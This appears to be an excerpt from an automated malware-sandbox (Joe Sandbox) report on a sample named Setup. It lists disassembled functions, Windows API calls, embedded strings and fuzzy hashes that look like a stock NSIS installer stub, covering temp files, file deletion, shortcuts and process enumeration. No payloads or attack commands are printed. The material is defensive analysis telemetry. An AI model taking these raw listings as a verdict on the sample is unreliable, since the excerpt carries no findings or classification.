• Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
• Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
• Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
• Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Control-flow Graph (rendered graph not recoverable; executed/not-executed block colouring omitted)

• Block 770: 405eab-405eb7; edge to 771
• Block 771: 405eb8-405eec, GetTickCount, GetTempFileNameW; edges to 772 and 773
• Block 772: 405efb-405efd; edge to 775
• Block 773: 405eee-405ef0; edges to 771 (loop) and 774
• Block 774: 405ef2; edge to 775
• Block 775: 405ef5-405ef8
APIs
• GetTickCount.KERNEL32 ref: 00405EC9
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
• Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
• Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
• Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Control-flow Graph (rendered graph not recoverable; executed/not-executed block colouring omitted)

• Block 776: 402175-40218b, call 401446 (×2); edges to 781 and 782
• Block 781: 402198-40219d; edges to 783 and 784
• Block 782: 40218d-402197, call 4062cf; edge to 781
• Block 783: 4021aa-4021b0, EnableWindow; edge to 786
• Block 784: 40219f-4021a5, ShowWindow; edge to 786
• Block 786: 4030e3-4030f2
APIs
• ShowWindow.USER32(00000000,00000000), ref: 0040219F
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• EnableWindow.USER32(00000000,00000000), ref: 004021AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Window$EnableShowlstrlenwvsprintf
• String ID: HideWindow
• API String ID: 1249568736-780306582
• Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
• Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
• Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
• Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
• SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
• Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
• Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
• Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

APIs
• GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 415043291-0
APIs
• GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
• CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Char$Next$CreateDirectoryPrev
• String ID:
• API String ID: 4115351271-0
APIs
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• GetDlgItem.USER32(?,000003F9), ref: 004049BF
• GetDlgItem.USER32(?,00000408), ref: 004049CC
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
• LoadBitmapW.USER32(0000006E), ref: 00404A2E
• SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
• ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
• SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
• DeleteObject.GDI32(?), ref: 00404AA5
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
• GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
• ShowWindow.USER32(?,00000005), ref: 00404BFB
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
• ImageList_Destroy.COMCTL32(?), ref: 00404DC8
• GlobalFree.KERNEL32(?), ref: 00404DD8
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
• SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
• ShowWindow.USER32(?,00000000), ref: 00404F75
• GetDlgItem.USER32(?,000003FE), ref: 00404F80
• ShowWindow.USER32(00000000), ref: 00404F87
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $ @$M$N
• API String ID: 1638840714-3479655940
APIs
• DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
• lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
• lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
• lstrlenW.KERNEL32(?), ref: 00406D58
• FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
• FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
• FindClose.KERNEL32(?), ref: 00406E5F
Strings
• Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
• ptF, xrefs: 00406D1A
• Delete: DeleteFile("%s"), xrefs: 00406DE8
• Delete: DeleteFile failed("%s"), xrefs: 00406E29
• RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
• RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
• RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
• RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
• \*.*, xrefs: 00406D2F
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
• API String ID: 2035342205-1650287579
APIs
• GetDlgItem.USER32(?,000003F0), ref: 00404525
• IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
• GetDlgItem.USER32(?,000003FB), ref: 00404553
• GetAsyncKeyState.USER32(00000010), ref: 0040455A
• GetDlgItem.USER32(?,000003F0), ref: 0040456F
• ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
• SetWindowTextW.USER32(?,?), ref: 004045AF
• SHBrowseForFolderW.SHELL32(?), ref: 00404669
• lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
• lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
• CoTaskMemFree.OLE32(00000000), ref: 00404674
  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
• String ID: F$A
• API String ID: 3347642858-1281894373
• Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
• Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
• Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
• Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
• ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
• ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
• lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
• lstrcmpA.KERNEL32(name,?), ref: 00406FF3
• CloseHandle.KERNEL32(?), ref: 00407212
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
Similarity
• API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
• String ID: %s: failed opening file "%s"$GetTTFNameString$name
• API String ID: 1916479912-1189179171
• Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
• Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
• Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
• Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
APIs
• GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
• GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
• lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
• lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406A73
Strings
Similarity
• API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
• String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 3581403547-1792361021
• Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
• Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
• Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
• Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
APIs
• CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
Strings
• CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
Similarity
• API ID: CreateInstance
• String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
• API String ID: 542301482-1377821865
• Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
• Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
• Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
• Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
• Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
• Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
• Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                        • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                        • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                        APIs
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                          • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• API String ID: 20674999-2124804629
• Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
• Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
• Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
• Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
• GetDlgItem.USER32(?,000003E8), ref: 004041AD
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
• GetSysColor.USER32(?), ref: 004041DB
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
• lstrlenW.KERNEL32(?), ref: 00404202
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
• GetDlgItem.USER32(?,0000040A), ref: 00404276
• SendMessageW.USER32(00000000), ref: 0040427D
• GetDlgItem.USER32(?,000003E8), ref: 004042AA
• SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
• LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
• SetCursor.USER32(00000000), ref: 004042FE
• ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
• LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
• SetCursor.USER32(00000000), ref: 00404322
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
• String ID: F$N$open
• API String ID: 3928313111-1104729357
• Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
• Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
• Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
• Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
APIs
• lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
• CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
• GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
• GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
• WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
• WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
• wsprintfA.USER32 ref: 00406B79
• GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
• WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
• GlobalFree.KERNEL32(00000000), ref: 00406C7E
• CloseHandle.KERNEL32(?), ref: 00406C88
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
